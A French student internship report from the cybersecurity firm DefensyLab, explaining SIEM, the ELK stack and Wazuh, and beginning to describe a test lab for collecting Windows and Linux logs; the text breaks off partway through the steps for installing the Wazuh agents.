Remerciement

Tout d’abord, je tiens à exprimer ma reconnaissance à mon institut pour la qualité

de la formation que j’ai reçue. Leur expertise et leur passion ont été essentielles pour notre
apprentissage et notre épanouissement professionnel.

Je veux remercier mon encadrant de stage Jemni Moataz pour son temps, son encadrement et
son soutien durant cette période. Grâce à ses conseils avisés et à son expertise, j'ai pu acquérir
de nouvelles compétences et développer mes connaissances.

Je tiens également à remercier le CEO de DEFENSY LAB Mr.Chabchoub Ahmed pour m'avoir
accueilli et m'avoir donné la chance de découvrir le monde professionnel. Le projet auquel j'ai
participé et les expériences que j'ai vécues durant ce stage resteront à jamais gravés dans ma
mémoire.

Je tiens à exprimer ma profonde gratitude envers ma famille et mes amis pour leur soutien
inestimable tout au long de mon parcours. En particulier, je voudrais remercier mon ami Aziz
Lfaoui pour son soutien sans faille, sa surveillance et sa contribution précieuse à mon
développement personnel et professionnel.
Table des matières
Introduction Générale ............................................................................................... 1
chapitre 1 : Présentation ........................................................................................ 2
1 Introduction : ................................................................................................. 2
1 Présentation de DefensyLab : ....................................................................... 2
1.1 Les services de DefensyLab : .................................................................. 2
1.2 SOC DefensyLab : ................................................................................... 3
2 Conclusion : .................................................................................................. 3
chapitre 2 : Présentation des technologies utilisées ............................................... 4
1 Introduction : ................................................................................................. 4
2 Présentation de SIEM : ................................................................................. 4
2.1 Définition de SIEM : ............................................................................... 4
2.2 Architecture de SIEM : ............................................................................ 4
2.2.1 Présentation générale sur ELK : ....................................................... 5
2.2.2 Interaction entre les éléments d’ELK : ............................................. 9
2.3 L’Utilité d’un outil SIEM : ...................................................................... 9
2.4 Les avantages de SIEM : ....................................................................... 10
2.5 Exemple d’utilisation des outils SIEM dans l’industrie : ...................... 11
3 Présentation de Wazuh :.............................................................................. 11
3.1 Wazuh en tant que solution SIEM : ....................................................... 11
3.2 Les fonctionnalités de Wazuh : ............................................................. 12
3.3 Architecture de Wazuh : ........................................................................ 13
3.4 Comment les différents composants fonctionnent : .............................. 14
3.5 Cas d’utilisation de Wazuh : .................................................................. 14
4 Conclusion : ................................................................................................ 15
chapitre 3 : Les tâches réalisées ........................................................................... 16
1 Introduction : ............................................................................................... 16
2 Contexte : .................................................................................................... 16
3 Réalisation : ................................................................................................ 16
3.1 Installation des machines : ..................................................................... 16
 3.2 Installation des agents Wazuh : ............................................................. 17
3.3 Collecter les logs Windows avec Wazuh : ............................................ 20
3.4 Collecter les logs Linux avec Wazuh : .................................................. 24
4 Conclusion : ................................................................................................ 29
Conclusion Générale .............................................................................................. 30
Liste des figures :
Figure 1: logo DefensyLab ....................................................................................... 2
Figure 2 : Logo Elasticsearch ................................................................................... 6
Figure 3 : Logo Logstash ......................................................................................... 7
Figure 4 : Logo Kibana ............................................................................................ 8
Figure 5 : Logo Wazuh........................................................................................... 11
Figure 6: collection des logs ................................................................................... 12
Figure 7 : architecture Wazuh ................................................................................ 14
Figure 8 : Les machines installée ........................................................................... 16
Figure 9 : L’adresse IP de serveur Wazuh ............................................................. 17
Figure 10 : Connexion à l'adresse IP de serveur .................................................... 17
Figure 11 : interface de Wazuh .............................................................................. 17
Figure 12 : première étape pour déployer un agent ................................................ 18
Figure 13 : la deuxième étape pour déployer un agent........................................... 18
Figure 14 : déployer l'agent Windows.................................................................... 18
Figure 15 : Installation d’agent Windows .............................................................. 19
Figure 16 : déployer l'agent linux ........................................................................... 19
Figure 17 : installation d'agent linux ...................................................................... 20
Figure 18 : Tableau de bord Wazuh ....................................................................... 20
Figure 19 : L'outil Sysmon ..................................................................................... 21
Figure 20 : configuration Sysmon .......................................................................... 21
Figure 21 : Injection d'un module dans le processus Lsass.exe ............................. 22
Figure 22 : Règle de détection................................................................................ 22
Figure 23 : Configuration Ossec ............................................................................ 23
Figure 24 : tableau de bord Kibana (logs Windows) ............................................. 23
Figure 25: ajouter des règles pour Linux ............................................................... 24
Figure 26 : configuration transfert des logs Linux au serveur wazuh .................... 25
Figure 27 : configuration des règles audit .............................................................. 25
Figure 28 : Configuration d’agent pour collecter les logs collectés par audit ........ 26
Figure 29 : exécution commande apache ............................................................... 26
Figure 30 : Création webshell fichier php .............................................................. 27
Figure 31: Création d'un reverseShell .................................................................... 27
Figure 32: Exécution de script localement ............................................................. 27
Figure 33 : ajout d'un" Listener" ............................................................................ 27
Figure 34 : l'acquisition du Shell ............................................................................ 28
Figure 35: les alertes collectées .............................................................................. 28
 Introduction Générale

Le stage est une véritable occasion pour l’étudiant pour s’adapter à la vie
professionnelle ainsi que pour l’évaluation de ses connaissances théoriques. En fait, le stagiaire
tire pleinement de l’expérience des personnes qui l’entourent et se trouve en contact avec
l’environnement professionnel, ce qui permet d’assurer l’insertion des étudiants dans
l’environnement externe

Dans ce cadre, une vue d'ensemble sur le système d'information de sécurité (SIEM) et sur la
solution Wazuh dans le domaine de la Cybersecurity des systèmes d'information a été acquise
grâce au stage effectué au sein de la start-up DefensyLab..

Ces dernières années nous avons constaté une augmentation des cyberattaques dont avant de
créer des dommages à leurs ressources, les analystes de sécurité doivent inventer et développer
de nouvelles techniques pour identifier de manière proactive les menaces potentielles visant
leur infrastructure. C'est pourquoi la plupart des organisations déploient des systèmes de gestion
des informations et des événements de sécurité (SIEM) qui évaluent les analystes de sécurité
travaillant dans le centre des opérations de sécurité (SOC) pour détecter et répondre aux
menaces.

Dans ce contexte, l'intérêt s'est porté sur Wazuh comme étant une solution open source SIEM
qui offre une visibilité complète de la sécurité du système d'information.

Ce rapport sera organisé de la manière suivante : la définition du SIEM et son rôle dans la
Cybersecurity seront présentés en premier lieu, suivi d'une description détaillée de la solution
Wazuh, y compris ses fonctionnalités clés. Enfin, les différentes étapes de mise en œuvre de
Wazuh dans un environnement de Cybersecurity seront abordées.

1
chapitre 1 : Présentation

1 Introduction :
Dans ce chapitre, nous présentons l'organisme d'accueil et ses activités. Ensuite,
nous présentons le département SOC.

1 Présentation de DefensyLab :
DefensyLab est une société de conseil en Cybersecurity fondée en 2020 en Tunisie,
avec une équipe d'experts dans diverses disciplines de la sécurité. Cette institution fournit des
services de Cybersecurity pour les organisations afin de mesurer le niveau de sécurité de leur
infrastructure technique ainsi que l'identification, l'investigation et l'atténuation des failles de
sécurité en cas d'éventuelles attaques.

Figure 1: logo DefensyLab

1.1 Les services de DefensyLab :

DefensyLab fournit à ses clients plusieurs services qui sont décrits dans les
suivants :

Audit de sécurité :

Une évaluation de la sécurité est réalisée pour identifier l'état actuel de la sécurité d'un système
d'information ou d'une organisation. L'évaluation fournit des recommandations d'amélioration,
permettant à l'organisation d'atteindre des objectifs de sécurité qui atténuent les risques.

Réponse aux incidents :

Le CERT (Computer Emergency Response Team) de DefensyLab est une équipe chargée
d’aider les organisations à détecter, enquêter et répondre aux événements de sécurité critiques.
Les experts expérimentés du CSIRT (Computer Security Incident Response Team) sont
compétents pour atténuer les effets néfastes des cyber-attaques, étudier leur mode de
propagation et fournir des solutions rapides et claires. Remédiation rapide et claire.

2
Chapitre 1 : Présentation

Conseil en sécurité :

Aide les organisations à développer une infrastructure informatique sûre et robuste et des
programmes qui s'alignent avec les meilleures pratiques de sécurité.

Tests de pénétration :

Représente le processus de simulation de différents vecteurs d'attaque contre un système

d'information afin d'identifier les failles de sécurité qui pourraient être exploitées par des
cybercriminels.

1.2 SOC DefensyLab :

Le centre d'opérations de sécurité est une unité centralisée composée d'outils
techniques, de processus, technologie et d'analystes de la sécurité qui protègent les actifs de
l'organisation tels que les serveurs, l'infrastructure du réseau, en détectant, analysant et
répondant de manière continue aux incidents.

Un SOC se compose également d'une équipe bleue (Blue Team) , dont l'objectif principal est
de se défendre contre des attaques simulées ou réelles et de fournir un moyen d'améliorer et de
renforcer l'ensemble de l'infrastructure de sécurité en créant de nouveaux outils ou en tirant
parti de la puissance des outils existants. L'équipe bleue doit être à jour et consciente des
nouvelles techniques malveillantes afin de construire une stratégie de mécanisme efficace
autour d'elles.

Dans un centre d'opérations de sécurité, l'équipe bleue travaille non seulement à l'évaluation de
l'environnement de sécurité, à l'investigation et à l'élimination des menaces potentielles, mais
elle déploie également de nouvelles approches et développe de nouveaux outils qui peuvent être
intégrés à leurs logiciels de sécurité actuels afin d’élever le niveau de sécurité de l'infrastructure.

L'une des nouvelles techniques utilisées aujourd'hui par les services de sécurité est l'intelligence
artificielle, qui peut être un atout majeur pour rendre les opérations plus efficaces et l'équipe
plus productive dans l'anticipation des attaques de type "zero-day".

2 Conclusion :
Dans ce chapitre, nous avons présenté l'entreprise hôte et ses activités. Nous
aborderons dans le chapitre suivant l’environnement utilisé pour effectuer le travail nécessaire.

3
chapitre 2 : Présentation des technologies utilisées

1 Introduction :
Le chapitre suivant portera sur la présentation des technologies clés utilisées dans
ce stage, à savoir le Système d'Information d'Événements et de Gestion de la Sécurité (SIEM)
et la solution open source Wazuh. Il vise à fournir une compréhension approfondie des concepts
clés et des fonctionnalités associées à ces technologies, ainsi qu'à montrer comment elles ont
été utilisées pour atteindre les objectifs fixés pour ce stage.

2 Présentation de SIEM :
2.1 Définition de SIEM :
SIEM « Système et outils d'Information d'événement de sécurité», est une solution
informatique qui collecte et analyse en temps réel les données de sécurité provenant de
différents sources de l'infrastructure informatique d'une entreprise. Le but est de détecter,
d'investiguer et de remédier aux incidents de sécurité en utilisant une vue centralisée des
activités de sécurité.[1]

2.2 Architecture de SIEM :

Lorsqu’on parle de SIEM on parle de composants et fonctionnalités d’une
architecture SIEM qui sont les suivants :

Renseignements sur les menaces : (THREAT INTELLIGENCE)

Collecte et regroupe les données des systèmes de sécurité et des périphériques réseau.

Flux de renseignements sur les menaces : (Threat Intelligence Feeds)

Combine les données internes avec les données de tiers sur les menaces et les vulnérabilités.

Corrélation et surveillance de la sécurité :

Établir un lien entre les événements et les données connexes et les incidents de sécurité, les
menaces ou les résultats de l’analyse judiciaire.

Analytiques :

Utilise des modèles statistiques et l’apprentissage automatique pour identifier des relations plus
profondes entre les éléments de données.

Alertes :

Analyse les événements et envoie des alertes pour informer le personnel de sécurité des
problèmes immédiats.

4
Chapitre 2 : Présentation des technologies utilisées

Tableaux de bord :

Crée des visualisations pour permettre au personnel d’examiner les données relatives aux
événements, d’identifier les modèles et les anomalies.

Conformité :

Rassemble les données des journaux pour les normes telles que HIPAA, PCI/DSS, HITECH,
SOX et GDPR et génère des rapports.

Rétention :

Stocke des données historiques à long terme, utiles pour la conformité et les investigations
forensique.

Analyse forensique :

Permet d’explorer les données des journaux et des événements pour découvrir les détails d’un
incident de sécurité.

Chasses des menaces :

Permet au personnel de sécurité d’exécuter des requêtes sur les données des journaux et des
événements afin de découvrir les menaces de manière proactive.

Intervention en cas d’incident :

Aide les équipes de sécurité à identifier et à répondre aux incidents de sécurité, en apportant
rapidement toutes les données pertinentes.

Automatisation du SOC :

Les SIEM avancés peuvent répondre automatiquement aux incidents en orchestrant les
systèmes de sécurité dans une approche connue sous le nom d’orchestration et réponse de
sécurité (SOAR) « security orchestration and response ».

Dans ce Contexte on peut parler d’ELK en tant qu’une architecture de SIEM.

2.2.1 Présentation générale sur ELK :

ELK Stack est un acronyme qui désigne trois logiciels open-source, à savoir
Elasticsearch, Logstash et Kibana, qui peuvent être utilisés ensemble pour créer une architecture
de SIEM.

5
Chapitre 2 : Présentation des technologies utilisées

 Elasticsearch :

Figure 2 : Logo Elasticsearch

Elasticsearch est un moteur de recherche distribué open-source qui permet de

stocker, rechercher et analyser des données de manière rapide et efficace. Il est conçu pour être
scalable, ce qui signifie qu’il peut facilement gérer des quantités énormes de données en temps
réel.[2]

L'utilité d'Elasticsearch réside dans sa capacité à stocker et à rechercher rapidement des

données, même lorsque celles-ci sont très volumineuses. Il peut également analyser les données
de manière approfondie, ce qui en fait un outil idéal pour la recherche de données, l'analyse de
tendances et la détection d'anomalies.

Les avantages d'Elasticsearch incluent :

1-Scalabilité : Il est conçu pour être distribué sur plusieurs nœuds, ce qui permet une
scalabilité horizontale pour gérer des volumes de données importants.

2-Performance : Il utilise une architecture basée sur des indices distribués pour offrir des
temps de réponse rapides pour les recherches complexes.

3-Flexibilité : Il prend en charge de nombreux formats de données différents et offre une

grande flexibilité pour la configuration de la recherche.

4-Analyse de données : Il offre des fonctionnalités d'analyse puissantes, notamment la

reconnaissance de motifs, l'analyse de mots-clés et la visualisation de données.

5-Recherche multi-langues : Il prend en charge de nombreuses langues différentes, ce qui en

fait un choix idéal pour les applications multilingues.

6-Interopérabilité : Il peut être facilement intégré avec d'autres technologies, telles que
Logstash et Kibana, pour fournir une plateforme complète de gestion de la donnée et
d'analyse.
6
Chapitre 2 : Présentation des technologies utilisées

7-Commodité : Il offre une API REST facile à utiliser pour les requêtes et l'indexation de
données, ce qui simplifie le développement d'applications basées sur la recherche.

En général, Elasticsearch est un outil puissant pour gérer et rechercher de grandes quantités de
données en temps réel, en faisant un choix idéal pour une large gamme d'utilisations, telles que
l'analyse de journaux, l'analyse de sécurité et l'intelligence d'affaires.

 Logstash :

Figure 3 : Logo Logstash

Logstash est un pipeline de traitement de données open-source conçu pour collecter,

analyser et stocker des journaux. Il fait partie de la suite Elastic Stack, qui comprend également
Elasticsearch et Kibana. Logstash permet d'entrer des données à partir de différentes sources,
de les transformer en un format standard et de les envoyer vers diverses destinations, telles que
Elasticsearch, des fichiers ou d'autres magasins de données.[3]

L'utilité de Logstash réside dans sa capacité à traiter rapidement et efficacement de grandes

quantités de données en temps réel. Cela en fait un outil idéal pour la gestion et le traitement
des journaux, ainsi que pour la recherche et l'analyse de données. Le pipeline de traitement de
Logstash est formé de plugins, ce qui lui permet de traiter de nombreux types de données
différents.

Les avantages de Logstash incluent :

1-Flexibilité : Logstash est très flexible et peut être utilisé pour collecter, traiter et stocker des
données de différentes sources, telles que des fichiers de logs, des bases de données et des
APIs.

2-Scalabilité : Logstash peut gérer des quantités énormes de données en temps réel, ce qui en
fait un choix populaire pour les entreprises à forte croissance.

3-Intégration facile : Logstash peut facilement être intégré à d'autres outils de la suite Elastic
Stack, tels qu’Elasticsearch et Kibana, ce qui permet une gestion efficace des données.

7
Chapitre 2 : Présentation des technologies utilisées

4-Traitement de données en temps réel : Logstash peut collecter et traiter les données en
temps réel, ce qui en fait un choix idéal pour les applications qui nécessitent une analyse en
temps réel des données.

5-Facilité d'utilisation : Logstash est facile à utiliser grâce à son interface de configuration
simple et intuitive.

6-Open-source : Logstash est un logiciel open-source, ce qui en fait un choix populaire pour
les entreprises qui cherchent une solution économique pour la gestion des données.

En résume, Logstash est un outil très utile pour les entreprises, il offre une solution flexible,
économique et scalable pour la gestion et la recherche de données.

 Kibana :

Figure 4 : Logo Kibana

Kibana est un outil d'analyse et de visualisation de données open-source qui permet

de rechercher, explorer et visualiser les données stockées dans Elasticsearch. Il est conçu pour
aider les utilisateurs à trouver rapidement les informations dont ils ont besoin et à les visualiser
de manière intuitive à l'aide de graphiques, de tableaux de bord et de visualisations
personnalisées.[4]

L'utilité de Kibana réside dans sa capacité à fournir une vue détaillée et facilement
compréhensible des données stockées dans Elasticsearch. Il permet aux utilisateurs de visualiser
les données de différentes manières, ce qui en fait un outil idéal pour la recherche de tendances,
la détection d'anomalies et l'identification de modèles.

Les avantages de Kibana incluent :

1-Interface utilisateur conviviale : Kibana est doté d'une interface utilisateur conviviale et
intuitive qui facilite la recherche et la visualisation des données.

2-Visualisations : Kibana offre une large gamme de visualisations pour aider les utilisateurs à
visualiser les données de manière compréhensible.

8
Chapitre 2 : Présentation des technologies utilisées

3-Tableaux de bord personnalisables : Les utilisateurs peuvent créer des tableaux de bord
personnalisables pour afficher les informations les plus pertinentes.

4-Facilité d'utilisation : Kibana est facile à utiliser et peut être intégré à d'autres outils de la
suite Elastic Stack, tels que Logstash et Elasticsearch, pour une gestion efficace des données.

5-Open-source : Kibana est un logiciel open-source, ce qui en fait un choix populaire pour les
entreprises qui cherchent une solution économique pour la gestion des données.

6-Recherche avancée : Kibana offre des fonctionnalités de recherche avancées, telles que la
recherche par expression régulière et la recherche contextuelle, pour aider les utilisateurs à
trouver rapidement les informations dont ils ont besoin.

7-Scalabilité : Kibana est conçu pour évoluer avec les besoins en matière de gestion des
données de l'entreprise, ce qui en fait un outil évolutif pour les entreprises en croissance.

En résume, Kibana est un outil d’analyse et de visualisation puissant et facile à utiliser.

2.2.2 Interaction entre les éléments d’ELK :

Le processus d'interaction entre les éléments d'ELK est le suivant :

1-Collecte de données log : Logstash est utilisé pour collecter les données log de différentes
sources telles que des fichiers de logs, des bases de données, des applications en temps réel,
etc.

2-Transformation de données : Une fois les données log collectées, Logstash les transforme
en un format standard utilisable pour l'analyse. Cela peut inclure l'extraction de champs clés, la
modification des données pour les normaliser, l'application de filtres pour éliminer les données
indésirables, etc.

3-Stockage de données : Les données log transformées sont envoyées à Elasticsearch pour
stockage. Elasticsearch est un moteur de recherche distribué qui stocke les données log dans
des index pour une recherche rapide et une analyse avancée.

4-Analyse de données : Les données log stockées dans Elasticsearch peuvent être analysées à
l'aide de requêtes complexes pour générer des tableaux de bord et des graphiques.

5-Visualisation de données : Les résultats de l'analyse de données log sont visualisés dans
Kibana, une interface de visualisation web. Les utilisateurs peuvent créer des tableaux de bord
personnalisés, visualiser les données sous forme de graphiques et les explorer en profondeur.

2.3 L’Utilité d’un outil SIEM :

Les entreprises doivent surveiller et protéger leurs données pour pouvoir se défendre
contre des cyber menaces de plus en plus avancées. Il est fort probable que votre entreprise ait
d’importantes quantités de données à collecter et à analyser. Avec l’explosion des volumes de
données et une complexité croissante, alors que les infrastructures IT convergent vers des

9
Chapitre 2 : Présentation des technologies utilisées

déploiements hybrides combinant le mode Cloud et sur-site, il est de plus en plus important de
disposer d’une solution de sécurité centrale pour suivre les comportements et les événements
critiques.

Les équipes SOC cherchent en permanence à être moins sollicitées pour être plus performantes.
Elles ont donc besoin de clarté. Sans un SIEM, les analystes en sécurité doivent parcourir des
millions de données hétérogènes et cloisonnées pour chaque application et source de sécurité.
Pour résumer, le SIEM peut accélérer la détection et la réponse aux cybermenaces, rendant ainsi
les analystes en sécurité plus efficaces et précis lors de leurs investigations.

Les solutions SIEM permettent aux entreprises de répondre rapidement et précisément aux
incidents de sécurité. Une solution SIEM offre des capacités de collecte, de classification, de
détection, de corrélation et d’analyse centralisées. De telles capacités permettent aux équipes
de surveiller et de résoudre plus facilement les problèmes rencontrés au sein d’une
infrastructure IT, et ce en temps réel.

Cependant, le manque de ressources qualifiées au sein du secteur signifie que les événements
de sécurité peuvent au final surcharger les analystes et les SOC (Security Operation Centers),
entraînant ainsi une désensibilisation aux alertes et une confusion quant à la priorisation des
ressources de sécurité de l’entreprise.[5]

2.4 Les avantages de SIEM :

Les solutions SIEM apportent différents atouts aux entreprises et jouent un rôle
important dans la rationalisation des flux de travaux de sécurité. Voici certains des avantages
des solutions SIEM :

Reconnaissance avancée des menaces en temps réelles : les solutions SIEM de surveillance
active gérant l'ensemble de votre infrastructure réduisent considérablement le délai nécessaire
pour identifier les menaces et vulnérabilités potentielles du réseau et y répondre, contribuant
ainsi à renforcer la stratégie de sécurité à mesure que l'organisation évolue.

Audit de conformité réglementaire : Les solutions SIEM permettent un audit et un reporting

de conformité centralisés de l'ensemble de l'infrastructure de l'entreprise. L'automatisation
avancée rationalise la collecte et l'analyse des journaux système et des événements de sécurité
afin de réduire l'utilisation des ressources internes, tout en respectant les normes strictes de
production de rapports de conformité.

Automatisation basée sur l'IA : Les solutions SIEM de nouvelle génération s'intègrent aux
puissantes fonctionnalités d'orchestration, d'automatisation et de réponse en matière de sécurité
(SOAR), ce qui fait gagner du temps et des ressources aux équipes informatiques dans la gestion
de la sécurité de l'entreprise. Grâce à un apprentissage automatique en profondeur qui s'adapte
automatiquement au comportement du réseau, ces solutions peuvent gérer des protocoles
complexes d'identification des menaces et de réponse aux incidents en beaucoup moins de
temps que les équipes humaines.

10
Chapitre 2 : Présentation des technologies utilisées

Amélioration de l'efficacité organisationnelle : En optimisant la visibilité des

environnements informatiques, la technologie SIEM peut être un moteur essentiel pour
améliorer l'efficacité entre les différents services. Grâce à une seule vue unifiée des données
système et des fonctions SOAR intégrées, les équipes peuvent communiquer et collaborer
efficacement lorsqu'elles répondent aux événements perçus et aux incidents de sécurité.

2.5 Exemple d’utilisation des outils SIEM dans l’industrie :

Le SIEM peut être utilisé dans divers secteurs pour surveiller et gérer les activités
de sécurité. Voici quelques exemples d'utilisation de SIEM dans différentes industries :

1. Finance : Les institutions financières utilisent le SIEM pour surveiller les transactions
et détecter les fraudes. Cela permet de garantir la sécurité des données financières
sensibles et d'assurer la conformité réglementaire.
2. Santé : Les organisations de soins de santé utilisent le SIEM pour surveiller les activités
de sécurité des systèmes de santé et protéger les données sensibles des patients. Cela
peut inclure la surveillance des accès aux dossiers médicaux et la détection des menaces
en temps réel.
3. Technologies de l'information : Les entreprises de technologies de l'information (TI)
utilisent le SIEM pour surveiller les activités de sécurité de leurs réseaux et protéger les
données sensibles des clients. Cela peut inclure la surveillance des accès aux bases de
données et la détection des attaques en temps réel.
4. Services gouvernementaux : Les agences gouvernementales utilisent le SIEM pour
surveiller les activités de sécurité et garantir la conformité réglementaire. Cela peut
inclure la surveillance des accès aux systèmes sensibles et la détection des menaces en
temps réel.
5. Secteur de la défense : Les agences de défense utilisent le SIEM pour surveiller les
activités de sécurité des systèmes militaires et protéger les informations sensibles. Cela
peut inclure la surveillance des accès aux systèmes de défense et la détection des
menaces en temps réel.[6]

Ces exemples montrent que le SIEM peut être utilisé dans de nombreux secteurs pour améliorer
la sécurité des données et des systèmes. Les organisations peuvent personnaliser le SIEM en
fonction de leurs besoins spécifiques pour garantir une surveillance de la sécurité efficace.

3 Présentation de Wazuh :
3.1 Wazuh en tant que solution SIEM :

Figure 5 : Logo Wazuh

Wazuh est une solution de sécurité intégrée et événementielle (SIEM) open source
pour la sécurité de l'information qui fournit une détection d'intrusion en temps réel (IDS), une

11
Chapitre 2 : Présentation des technologies utilisées

surveillance des activités et une analyse des journaux. Il est basé sur les technologies
d'Elasticsearch, Logstash et Kibana (ELK stack) et est conçu pour être intégré à ces outils pour
une analyse visuelle des données de sécurité.

Wazuh a était Créer en 2015, est une solution open-source, gratuite et étendue de gestion des
droits de propriété intellectuelle. Complète. Elle peut être utilisée dans toutes les échelles
d'environnements. Wazuh fonctionne sur un module de gestion et d'agent. Simplement, un
dispositif est dédié à l'exécution de Wazuh nommé un gestionnaire, où Wazuh fonctionne sur
un modèle de gestion et d'agent où le gestionnaire est responsable de la gestion des agents
installés sur les dispositifs que vous souhaitez surveiller.[7]

Regardons ce modèle dans le diagramme ci-dessous :

Figure 6: collection des logs

3.2 Les fonctionnalités de Wazuh :

Wazuh est un système de surveillance de la sécurité pour les environnements informatiques

distribués. Il offre plusieurs fonctionnalités clés, notamment :

Détection de menace : Wazuh utilise des règles de signature pour détecter les attaques et les
anomalies dans les systèmes et les réseaux

Surveillance de la sécurité : Wazuh surveille les fichiers et les journaux système pour détecter
les activités malveillantes et les tentatives d'intrusion.

Analyse de la sécurité : Wazuh offre des fonctionnalités d'analyse en temps réel pour aider
les équipes de sécurité à comprendre les incidents et à les résoudre plus rapidement.
12
Chapitre 2 : Présentation des technologies utilisées

Rapports de sécurité : Wazuh génère des rapports de sécurité détaillés pour permettre aux
équipes de sécurité de suivre les incidents et les tendances.

Intégration d'outils tiers : Wazuh peut être intégré à d'autres outils de sécurité pour une
meilleure collaboration et une analyse plus approfondie des données

Surveillance de la conformité : Wazuh permet de surveiller la conformité avec les normes de

sécurité et les réglementations pour garantir la protection des données sensibles.

Alertes en temps réel : Wazuh envoie des alertes en temps réel pour signaler les incidents de
sécurité critiques.

En résumé, Wazuh est conçu pour aider les équipes de sécurité à protéger les environnements
informatiques contre les menaces.

3.3 Architecture de Wazuh :

L'architecture de Wazuh est basée sur un modèle client-serveur distribué. Elle

comprend les composants suivants :

Agent Wazuh : C'est un logiciel installé sur les machines à protéger pour collecter les journaux,
surveiller l'activité système et envoyer des alertes au serveur Wazuh. Il est disponible pour
différents systèmes d'exploitation, tels que Linux, Windows, MacOs, Solaris, AIX et HP-UX.

Serveur Wazuh : C'est le composant central de l'infrastructure de Wazuh, responsable de la

collecte des données des agents, de la détection d'intrusion, de la corrélation d'événements et
de l'envoi d'alertes. Le serveur Wazuh utilise Elasticsearch, Logstash et Kibana (ELK) pour
stocker, indexer, analyser et visualiser les données de sécurité.

Wazuh API : C'est une interface de programmation d'application (API) qui permet aux
utilisateurs d'accéder aux fonctionnalités de Wazuh, telles que la gestion des règles de détection,
la gestion des agents, la recherche de journaux et l'envoi d'alertes.

Wazuh App : C'est une interface utilisateur graphique (GUI) pour Kibana, qui fournit des
tableaux de bord et des visualisations pour les données de sécurité stockées dans Elasticsearch

Wazuh Ruleset : C'est un ensemble de règles de détection d'intrusion préconfigurées qui sont
utilisées par les agents pour surveiller les activités système et détecter les attaques potentielles.
Les règles sont régulièrement mises à jour pour inclure de nouvelles règles de détection.

13
Chapitre 2 : Présentation des technologies utilisées

Voici une illustration de l'architecture de Wazuh, qui montre les différents composants de
Wazuh :

Figure 7 : architecture Wazuh

3.4 Comment les différents composants fonctionnent :

Les différents composants de Wazuh travaillent ensemble de manière cohérente
pour fournir des fonctionnalités de sécurité complètes. Voici un aperçu de la façon dont chaque
composant contribue à la solution de sécurité globale de Wazuh :

Les agents Wazuh collectent les journaux et surveillent l'activité système des machines à
protéger. Les données collectées par les agents sont envoyées au serveur Wazuh pour l'analyse.
Ce dernier collecte les données des agents, les analyse pour détecter les menaces potentielles et
envoie des alertes en cas de comportement suspect. Le serveur utilise des règles de détection
préconfigurées et des techniques d'analyse de données pour identifier les menaces potentielles.
Les règles de détection préconfigurées incluses dans Wazuh sont mises à jour régulièrement
pour inclure de nouvelles règles de détection d'intrusion. Les agents surveillent l'activité
système en utilisant ces règles de détection pour détecter les menaces potentielles. En cas de
comportement suspect, le serveur envoie des alertes à l'utilisateur ou à une solution de SIEM
tierce. L'API Wazuh permet aux utilisateurs d'interagir avec les différents composants de
Wazuh, tels que la gestion des agents, la gestion des règles de détection et l'envoi d'alertes.
L'application Wazuh fournit une interface utilisateur graphique pour visualiser les données de
sécurité stockées dans Elasticsearch. Elle inclut des tableaux de bord et des visualisations pour
surveiller l'état de la sécurité des systèmes.

3.5 Cas d’utilisation de Wazuh :

Wazuh peut être utilisé dans différents contextes pour renforcer la sécurité des
systèmes et des réseaux. On peut prendre des exemples tel que :

Surveillance de la sécurité des serveurs : Il peut être utilisé pour surveiller la sécurité des
serveurs en temps réel. Les agents Wazuh installés sur les serveurs collectent les données
système et les journaux, puis les envoient au serveur Wazuh pour l'analyse. Le serveur Wazuh

14
Chapitre 2 : Présentation des technologies utilisées

utilise des règles de détection préconfigurées pour identifier les menaces potentielles et envoie
des alertes en cas de comportement suspect.

Détection d'intrusion : Il peut être utilisé pour détecter les intrusions sur les systèmes et les
réseaux. Les règles de détection préconfigurées de Wazuh incluent des signatures d'attaque
connues, des analyses comportementales, des techniques de détection de rootkit et bien plus
encore. En utilisant Wazuh, les administrateurs peuvent être alertés immédiatement en cas
d'activité malveillante.

Surveillance de la conformité : Il peut être utilisé pour surveiller la conformité des systèmes
aux politiques de sécurité. Les règles de détection de Wazuh peuvent être configurées pour
vérifier que les systèmes sont configurés de manière à respecter les politiques de sécurité, par
exemple en vérifiant que les ports inutilisés sont fermés ou que les mises à jour de sécurité sont
installées.

Détection de logiciels malveillants : Il peut être utilisé pour détecter les logiciels malveillants
sur les systèmes. Les règles de détection de Wazuh peuvent être configurées pour identifier les
fichiers malveillants, les processus malveillants et les modifications suspectes apportées au
système.

Analyse forensique : Il peut être utilisé pour aider à l'analyse forensique après une attaque. Les
données collectées par Wazuh, telles que les journaux système et les fichiers malveillants,
peuvent être utilisées pour déterminer comment une attaque a été effectuée et pour identifier les
parties du système qui ont été compromises.

4 Conclusion :
En somme, ce chapitre parle des technologies utilisées dans ce stage leurs
architectures et fonctionnements. Dans le chapitre suivant en parlant des tâches réalisées.

15
chapitre 3 : Les tâches réalisées

1 Introduction :
Ce chapitre va présenter les différentes tâches réalisées lors de ce stage, ainsi que
les connaissances et les compétences requises tout au long de cette expérience.

2 Contexte :
Le contexte de stage consiste en la mise en place d'un environnement de test
composé de trois machines : Parot Linux, Windows 10 et la machine virtuelle OVA de Wazuh.
L'objectif est de tester le logiciel open source Wazuh et d'évaluer son efficacité dans la collecte
de données à partir de différentes machines. Après avoir configuré les machines, des logs ont
été collectés à partir des machines Parot et Windows et analysés avec Wazuh. Enfin, une attaque
a été réalisée pour tester la capacité de Wazuh à détecter l'attaque. Cette expérience fournit une
excellente occasion de développer les compétences en matière de sécurité informatique et de se
familiariser avec les outils open source de surveillance et de détection de menaces.

3 Réalisation :
3.1 Installation des machines :
En commençant la mise en place d’un environnement de test par l’installation des
trois machines qui sont :

Parot Linux : Parrot Linux est une distribution Linux basée sur Debian qui se concentre sur la
sécurité informatique et la confidentialité. Elle est conçue pour les professionnels de la sécurité
informatique, les testeurs de pénétration et les chercheurs en sécurité.

Windows 10 : Windows 10 est un système d'exploitation développé par Microsoft. Il est destiné
aux ordinateurs personnels, aux tablettes, aux smartphones, aux consoles de jeux et autres
appareils électroniques.

OVA Wazuh : L'OVA (Open Virtual Appliance) de Wazuh est une machine virtuelle
préconfigurée qui contient le logiciel Wazuh, ainsi que toutes les dépendances et les prérequis
nécessaires pour l'exécuter.

Figure 8 : Les machines installée

16
Chapitre 3 Les tâches réalisées

3.2 Installation des agents Wazuh :

Après l’installation et la configuration des machines, les agents Wazuh ont été
installés en suivants les étapes nécessaires qui sont :

1... Accéder à OVA pour avoir l’adresse IP de serveur Wazuh comme montre la figure ci-
dessous:

Figure 9 : L’adresse IP de serveur Wazuh

2...Connecter à cette adresse sur le moteur de recherche Google

